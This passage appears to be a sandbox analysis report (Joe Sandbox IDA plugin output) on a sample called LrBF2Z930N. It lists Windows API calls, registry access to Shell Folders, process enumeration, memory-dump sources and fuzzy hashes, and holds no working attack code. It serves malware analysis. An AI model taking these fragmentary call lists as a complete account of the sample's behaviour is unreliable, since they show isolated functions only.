                                                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1297977491-0
                                                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                      APIs
                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                      • String ID:
                                                                                      • API String ID: 2154303073-0
                                                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                      APIs
                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3150196962-0
                                                                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                      APIs
                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$PointerRead
                                                                                      • String ID:
                                                                                      • API String ID: 3154509469-0
                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                      APIs
                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4232544981-0
                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                      APIs
                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FileModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3859505661-0
                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                      APIs
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                      APIs
                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
